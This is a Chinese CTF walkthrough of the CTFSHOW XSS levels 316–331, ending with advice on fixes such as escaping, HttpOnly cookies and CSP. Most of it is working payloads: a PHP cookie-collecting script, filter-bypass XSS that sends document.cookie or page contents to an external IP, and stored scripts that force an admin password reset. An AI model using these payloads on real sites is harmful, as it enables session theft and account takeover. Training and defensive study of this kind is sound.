XSS绕过-CTFSHOW-361到331关卡绕过WP
前言:
document.cookie//获取当前浏览器cookie信息
windows.location.her="xxxx.com'去访问目标网站
GET.PHP?
<?PHP
$cookie=$_GET['c'];
$myfile = fopen("cookie.txt","w"); //打开一个文件,以写入的方式
fwrite($myfile,$cookie);//将cookie变量的值写入到$myfile
fclose($myfile);//关闭这个文件
?>
XSS绕过-CTFSHOW-361到331关卡绕过WP
绕过:https://xz.aliyun.com/t/4067
反射型
316-反射型-直接远程调用
<script>window.location.href='http://47.94.236.117/get.php?c='+document.cookie</script>
317-反射型-过滤<script>
<img src=1 onerror=window.location.href='http://47.94.236.117/get.php?c='+document.cookie;>
318 319-反射型-过滤<img>
<input onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">
<svg onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">
320-326-反射型-过滤空格
<svg/onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">
存储型
327-存储型-无过滤
<script>window.location.href='http://47.94.236.117/get.php?c='+document.cookie</script>
328-存储型-注册插入JS
<script>window.location.href='http://47.94.236.117/get.php?c='+document.cookie</script>
329-存储型-失效凭据需1步完成所需操作//session失效,那么我们只能通过获取当前页面的源代码
<script>
$('.laytable-cell-1-0-1').each(function(index,value){
if(value.innerHTML.indexOf('ctf'+'show')>-1){
window.location.href='http://47.94.236.117/get.php?c='+value.innerHTML;
}
});
</script>
330-存储型-借助修改密码重置管理员密码(GET)
<script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>
<script>src='http://127.0.0.1/api/change.php?p=123';</script>//比较隐藏
331-存储型-借助修改密码重置管理员密码(POST)
<script>$.ajax({url:'http://127.0.0.1/api/change.php',type:'post',data:{p:'123'}});</script>
XSS修复-过滤函数&http_only&CSP&长度限制
1、过滤一些危险字符,以及转义& < > " ' 等危险字符
自定义过滤函数引用
2、HTTP-only Cookie(不让js函数读取cookie)
https://www.php.cn/php-ask-457831.html
php.ini设置或代码引用
session.cookie_httponly =1
ini_set("session.cookie_httponly", 1);
3、设置CSP(Content Security Policy)
https://blog.youkuaiyun.com/a1766855068/article/details/89370320
header("Content-Security-Policy:img-src 'self' ");
4、输入内容长度限制,实体转义等
1642

被折叠的 条评论
为什么被折叠?



